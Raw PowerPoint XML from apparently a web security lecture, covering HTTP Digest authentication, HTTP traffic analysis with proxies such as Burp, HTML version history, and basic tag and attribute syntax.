                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can you crack the username/password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398533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HTTP 1.1 Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>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a:t>Defines an additional authentication scheme based on cryptographic digests (RFC 2617)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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a:t>Server sends a nonce as challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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a:t>Client sends request with digest of the username, the password, the given nonce value, the HTTP method, and the requested URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="588"/>
              </a:spcBef>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noProof="0" dirty="0"/>
              <a:t>To authenticate the users the web server has to have access to clear-text user passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39969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a:t>Monitoring and Modifying HTTP Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTTP traffic can be analyzed in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Sniffers can be used to collect traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Servers can be configured to create extensive logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Browsers can be used to analyze the content received from a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Client-side/server-side proxies can be used to analyze the traffic without having to modify the target environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Client-side proxies are especially effective in performing vulnerability analysis because they allow one to examine and modify each request and reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Firefox extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>LiveHTTPHeaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>, Tamper Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Burp Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a professional-grade tool that I use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13785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Sir Tim Berners-Lee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2837309" y="1343835"/>
            <a:ext cx="3469383" cy="4863066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1817849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Hypertext Markup Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>A simple data format used to create hypertext documents that are portable from one platform to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Based on Standard Generalized Markup Language (SGML) (ISO 8879:1986)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 2.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed in RFC 1866 (November 1995)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 3.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed as World Wide Web Consortium (W3C) recommendation (January 1997)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 4.01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed as W3C recommendation (December 1999)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>XHTML 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Attempt by W3C to reformulate HTML into Extensible Markup Language (XML) (January 2000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 5.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed as W3C recommendation (October 2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML 5.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Under development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17617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Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic idea is to “markup” document with tags, which add meaning to raw text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start tag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Followed by text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End tag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-closing tag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;bar /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Void tags (have no end tag):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4162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Tags	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag are hierarchical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738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Tags </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;title&gt;Example&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;p&gt;I am the example text&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15305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Tags </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>I am the example text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2148204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Tags </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tags can have “attributes” that provide metadata about the tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attributes live inside the start tag after the tag name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four different syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;foo bar&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the tag name and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is an attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;foo bar=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> has the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>baz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;foo bar=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;foo bar=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Multiple attributes are separated by spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;foo bar='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' disabled required="true"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35095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Hyperlink</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>nchor tag is used to create a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> attribute is used provide the URI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Text inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nchor tag is the text of the hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Example&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 11.02.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45" y="4928541"/>
            <a:ext cx="850900" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26722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Basic HTML 5 Page</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latin typeface="Consolas"/>
